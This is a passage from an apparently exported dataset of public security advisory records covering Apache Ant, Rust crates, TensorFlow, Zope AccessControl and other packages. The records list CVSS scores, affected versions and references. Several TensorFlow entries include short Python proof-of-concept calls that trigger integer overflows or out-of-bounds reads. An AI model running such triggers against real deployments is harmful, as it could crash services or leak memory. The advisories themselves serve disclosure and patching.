'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ant:ant'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.16'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.ant:ant'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36374'}, {'type': 'WEB', 'url': 'https://ant.apache.org/security.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r27919fd4db07c487239c1d9771f480d89ce5ee2750aa9447309b709a@%3Ccommits.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r544c9e8487431768465b8b2d13982c75123109bd816acf839d46010d@%3Ccommits.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rad36f470647c5a7c02dd78c9973356d2840766d132b597b6444e373a@%3Cnotifications.groovy.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd5412a5b9a25aed2a02c3317052d38a97128314d50bc1ed36e81d38%40%3Cuser.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf4bb79751a02889623195715925e4fd8932dd3c97e0ade91395a96c6@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210819-0007/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-130'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T19:18:28Z', 'nvd_published_at': '2021-07-14T07:15:00Z'}" +1.4.0,GHSA-mcrf-7hf9-f6q5,2023-06-13T20:48:55Z,2021-08-25T21:00:09Z,,[],Unchecked vector pre-allocation,"Affected versions of this crate pre-allocate memory on deserializing raw buffers without checking whether there is sufficient data available. This allows an attacker to do denial-of-service attacks by sending small msgpack messages that allocate gigabytes of memory. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'rmpv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/3Hren/msgpack-rust/issues/151'}, {'type': 'PACKAGE', 'url': 'https://github.com/3Hren/msgpack-rust'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2017-0006.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-06T19:28:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-v7q4-97x4-4qw2,2021-08-19T17:22:46Z,2021-08-25T20:51:58Z,,['CVE-2021-28030'], Use of Uninitialized Resource in truetype,An issue was discovered in the truetype crate before 0.30.1 for Rust. Attackers can read the contents of uninitialized memory locations via a user-provided Read operation within Tape::take_bytes.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'truetype'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.30.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28030'}, {'type': 'WEB', 'url': 'https://github.com/bodoni/truetype/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodoni/truetype'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0029.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:22:46Z', 'nvd_published_at': None}" +1.4.0,GHSA-h6jh-7gv5-28vg,2021-08-23T19:25:38Z,2021-08-25T14:43:34Z,,['CVE-2021-37646'],Bad alloc in `StringNGrams` caused by integer conversion,"### Impact +The implementation of `tf.raw_ops.StringNGrams` is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. + +```python +import tensorflow as tf + +tf.raw_ops.StringNGrams( + data=['',''], + data_splits=[0,2], + separator=' '*100, + ngram_widths=[-80,0,0,-60], + left_pad=' ', + right_pad=' ', + pad_width=100, + preserve_short_sequences=False) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/string_ngrams_op.cc#L184) calls `reserve` on a `tstring` with a value that sometimes can be negative if user supplies negative `ngram_widths`. The `reserve` method calls `TF_TString_Reserve` which has an `unsigned long` argument for the size of the buffer. Hence, the implicit conversion transforms the negative value to a large integer. + +### Patches +We have patched the issue in GitHub commit [c283e542a3f422420cfdb332414543b62fc4e4a5](https://github.com/tensorflow/tensorflow/commit/c283e542a3f422420cfdb332414543b62fc4e4a5). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h6jh-7gv5-28vg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37646'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c283e542a3f422420cfdb332414543b62fc4e4a5'}]","{'cwe_ids': ['CWE-681'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T19:25:38Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-mgg8-9pvp-6qcw,2021-08-24T18:01:27Z,2021-08-25T20:59:59Z,2021-08-24T18:01:27Z,[],MvccRwLock allows data races & aliasing violations,"Affected versions of the `noise_search` crate unconditionally implement Send/Sync for `MvccRwLock`. +This can lead to data races when types that are either `!Send` or `!Sync` (e.g. `Rc`, `Arc>`) are contained inside `MvccRwLock` and sent across thread boundaries. The data races can potentially lead to memory corruption (as demonstrated in the PoC from the original report issue). + +Also, safe APIs of `MvccRwLock` allow aliasing violations by allowing `&T` and `LockResult>>` to co-exist in conflicting lifetime regions. The APIs of `MvccRwLock` should either be marked as `unsafe` or `MbccRwLock` should be changed to private or pub(crate). +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'noise_search'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pipedown/noise/issues/72'}, {'type': 'PACKAGE', 'url': 'https://github.com/pipedown/noise'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0141.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T17:16:18Z', 'nvd_published_at': None}" +1.4.0,GHSA-qcx9-j53g-ccgf,2021-08-30T23:27:55Z,2021-08-05T17:01:30Z,,['CVE-2021-32807'],Remote Code Execution via unsafe classes in otherwise permitted modules,"### Impact +The module `AccessControl` defines security policies for Python code used in restricted code within Zope applications. Restricted code is any code that resides in Zope's object database, such as the contents of `Script (Python)` objects. + +The policies defined in `AccessControl` severely restrict access to Python modules and only exempt a few that are deemed safe, such as Python's `string` module. However, full access to the `string` module also allows access to the class `Formatter`, which can be overridden and extended within `Script (Python)` in a way that provides access to other unsafe Python libraries. Those unsafe Python libraries can be used for remote code execution. + +By default, you need to have the admin-level Zope ""Manager"" role to add or edit `Script (Python)` objects through the web. Only sites that allow untrusted users to add/edit these scripts through the web - which would be a very unusual configuration to begin with - are at risk. + +### Patches +The problem has been fixed in AccessControl 4.3 and 5.2. +Only AccessControl versions 4 and 5 are vulnerable, and only on Python 3, not Python 2.7. + +### Workarounds +A site administrator can restrict adding/editing `Script (Python)` objects through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing these scripts through the web should be restricted to trusted users only. This is the default configuration in Zope. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the [AccessControl issue tracker](https://github.com/zopefoundation/AccessControl/issues) +* Email us at [security@plone.org](mailto:security@plone.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'AccessControl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0'}, {'fixed': '4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'AccessControl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/AccessControl/security/advisories/GHSA-qcx9-j53g-ccgf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32807'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/AccessControl/commit/b42dd4badf803bb9fb71ac34cd9cb0c249262f2c'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/AccessControl'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/AccessControl/blob/master/CHANGES.rst#51-2021-07-30'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T23:00:00Z', 'nvd_published_at': '2021-07-30T22:15:00Z'}" +1.4.0,GHSA-p8q8-jfcv-g2h2,2021-09-20T20:26:41Z,2021-08-09T20:40:06Z,,['CVE-2021-32610'],Directory Traversal in Archive_Tar,"In Archive_Tar before 1.4.14, symlinks can refer to targets outside of the extracted archive, a different vulnerability than CVE-2020-36193.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pear/archive_tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32610'}, {'type': 'WEB', 'url': 'https://github.com/pear/Archive_Tar/commit/7789ebb2f34f9e4adb3a4152ad0d1548930a9755'}, {'type': 'WEB', 'url': 'https://github.com/pear/Archive_Tar/commit/b5832439b1f37331fb4f87e67fe4f'}, {'type': 'PACKAGE', 'url': 'https://github.com/pear/Archive_Tar'}, {'type': 'WEB', 'url': 'https://github.com/pear/Archive_Tar/releases/tag/1.4.14'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00023.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42GPGVVFTLJYAKRI75IVB5R45NYQGEUR/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CAODVMHGL5MHQWQAQTXQ7G7OE3VQZ7LS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G5LTY6COQYNMMHQJ3QIOJHEWCKD4XDFH/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VJQQYDAOWHD6RDITDRPHFW7WY6BS3V5N/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2021-004'}]","{'cwe_ids': ['CWE-59'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:04:45Z', 'nvd_published_at': '2021-07-30T14:15:00Z'}" +1.4.0,GHSA-9w2p-5mgw-p94c,2021-08-23T19:20:13Z,2021-08-25T14:43:37Z,,['CVE-2021-37645'],Integer overflow due to conversion to unsigned,"### Impact +The implementation of `tf.raw_ops.QuantizeAndDequantizeV4Grad` is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. + +```python +import tensorflow as tf + +tf.raw_ops.QuantizeAndDequantizeV4Grad( + gradients=[1.0,2.0], + input=[1.0,1.0], + input_min=[0.0], + input_max=[10.0], + axis=-100) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L126) uses the `axis` value as the size argument to `absl::InlinedVector` constructor. But, the constructor uses an unsigned type for the argument, so the implicit conversion transforms the negative value to a large integer. + +### Patches +We have patched the issue in GitHub commit [96f364a1ca3009f98980021c4b32be5fdcca33a1](https://github.com/tensorflow/tensorflow/commit/96f364a1ca3009f98980021c4b32be5fdcca33a1). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, and TensorFlow 2.4.3, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9w2p-5mgw-p94c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37645'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/96f364a1ca3009f98980021c4b32be5fdcca33a1'}]","{'cwe_ids': ['CWE-681'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T19:20:13Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-7j36-gc4r-9x3r,2023-06-13T16:57:55Z,2021-08-25T20:44:48Z,,['CVE-2019-16139'],Out of bounds access in compact_arena,"Affected versions of this crate did not properly implement the generativity, because the invariant lifetimes were not necessarily dropped. + +This allows an attacker to mix up two arenas, using indices created from one arena with another one. This might lead to an out-of-bounds read or write access into the memory reserved for the arena. + +The flaw was corrected by implementing generativity correctly in version 0.4.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'compact_arena'}, 'ecosystem_specific': {'affected_functions': ['compact_arena::SmallArena::new']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16139'}, {'type': 'WEB', 'url': 'https://github.com/llogiq/compact_arena/issues/22'}, {'type': 'PACKAGE', 'url': 'https://github.com/llogiq/compact_arena'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0015.html'}]","{'cwe_ids': ['CWE-125', 'CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:37Z', 'nvd_published_at': '2019-09-09T12:15:00Z'}" +1.4.0,GHSA-34p9-f4q3-c4r7,2023-06-13T20:14:09Z,2021-08-25T20:43:11Z,,['CVE-2016-10931'],Improper Certificate Validation in openssl,"All versions of rust-openssl prior to 0.9.0 contained numerous insecure defaults including off-by-default certificate verification and no API to perform hostname verification. Unless configured correctly by a developer, these defaults could allow an attacker to perform man-in-the-middle attacks. The problem was addressed in newer versions by enabling certificate verification by default and exposing APIs to perform hostname verification. Use the SslConnector and SslAcceptor types to take advantage of these new features (as opposed to the lower-level SslContext type).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10931'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-openssl'}, {'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/releases/tag/v0.9.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2016-0001.html'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:25:06Z', 'nvd_published_at': '2019-08-26T12:15:00Z'}" +1.4.0,GHSA-r4c4-5fpq-56wg,2021-08-24T13:46:31Z,2021-08-25T14:42:20Z,,['CVE-2021-37664'],Heap OOB in boosted trees,"### Impact +An attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to `BoostedTreesSparseCalculateBestFeatureSplit`: + +```python +import tensorflow as tf + +tf.raw_ops.BoostedTreesSparseCalculateBestFeatureSplit( + node_id_range=[0,10], + stats_summary_indices=[[1, 2, 3, 0x1000000]], + stats_summary_values=[1.0], + stats_summary_shape=[1,1,1,1], + l1=l2=[1.0], + tree_complexity=[0.5], + min_node_weight=[1.0], + logits_dimension=3, + split_type='inequality') +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/stats_ops.cc) needs to validate that each value in `stats_summary_indices` is in range. + +### Patches +We have patched the issue in GitHub commit [e84c975313e8e8e38bb2ea118196369c45c51378](https://github.com/tensorflow/tensorflow/commit/e84c975313e8e8e38bb2ea118196369c45c51378). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r4c4-5fpq-56wg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37664'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e84c975313e8e8e38bb2ea118196369c45c51378'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:46:31Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-39xg-8p43-h76x,2023-06-13T20:28:35Z,2021-08-25T20:51:40Z,,['CVE-2020-36203'],Data races in reffers,"ARefss<'a, V> is a type that is assumed to contain objects that are Send + Sync. + +In the affected versions of this crate, Send/Sync traits are unconditionally implemented for ARefss<'a, V>. + +By using the ARefss::map() API, we can insert a !Send or !Sync object into ARefss<'a, V>. After that, it is possible to create a data race to the inner object of ARefss<'a, V>, which can lead to undefined behavior & memory corruption. + +The flaw was corrected in commit `6dd7ca0` by adding trait bound V: Send + Sync to ARefss::map() API.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'reffers'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36203'}, {'type': 'WEB', 'url': 'https://github.com/diwic/reffers-rs/issues/7'}, {'type': 'WEB', 'url': 'https://github.com/diwic/reffers-rs/commit/6dd7ca0d50f2464df708975cdafcfaeeb6d41c66'}, {'type': 'PACKAGE', 'url': 'https://github.com/diwic/reffers-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0094.html'}]","{'cwe_ids': ['CWE-362', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:49:46Z', 'nvd_published_at': None}" +1.4.0,GHSA-gmv4-vmx3-x9f3,2021-08-19T20:52:14Z,2021-08-25T20:49:37Z,,['CVE-2020-35914'],Data races in lock_api,An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of RwLockWriteGuard unsoundness.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lock_api'}, 'ecosystem_specific': {'affected_functions': ['lock_api::RwLockWriteGuard']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35914'}, {'type': 'WEB', 'url': 'https://github.com/Amanieu/parking_lot/pull/262'}, {'type': 'PACKAGE', 'url': 'https://github.com/Amanieu/parking_lot'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0070.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:52:14Z', 'nvd_published_at': None}" +1.4.0,GHSA-pjxv-w3qj-j8m3,2021-08-31T21:00:58Z,2021-08-09T20:42:13Z,,['CVE-2021-23415'],Directory Traversal in elFinder.AspNet,"This affects the package elFinder.AspNet before 1.1.1. + The user-controlled file name is not properly sanitized before it is used to create a file system path. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'elFinder.AspNet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23415'}, {'type': 'WEB', 'url': 'https://github.com/mguinness/elFinder.AspNet/commit/675049b39284a9e84f0915c71d688da8ebc7d720'}, {'type': 'PACKAGE', 'url': 'https://github.com/mguinness/elFinder.AspNet'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-DOTNET-ELFINDERASPNET-1315153'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:41:18Z', 'nvd_published_at': '2021-07-28T16:15:00Z'}" +1.4.0,GHSA-p2q9-9cq6-h3jw,2023-06-13T20:11:33Z,2021-08-25T20:47:46Z,,['CVE-2020-35877'],Out of bounds read in Ozone,An issue was discovered in the ozone crate through version 0.1.0 for Rust. Memory safety is violated because of out-of-bounds access.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ozone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35877'}, {'type': 'PACKAGE', 'url': 'https://github.com/bqv/ozone'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0022.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:08:51Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-h7qh-3h6f-w79p,2023-06-13T20:05:17Z,2021-08-25T20:49:41Z,,['CVE-2020-35909'],Unexpected panic in multihash,"In versions prior 0.11.3 it's possible to make from_slice panic by feeding it certain malformed input. It's never documented that from_slice (and from_bytes which wraps it) can panic, and its' return type (Result) suggests otherwise. In practice, from_slice/from_bytes is frequently used in networking code and is being called with unsanitized data from untrusted sources. This can allow attackers to cause DoS by causing an unexpected panic in the network client's 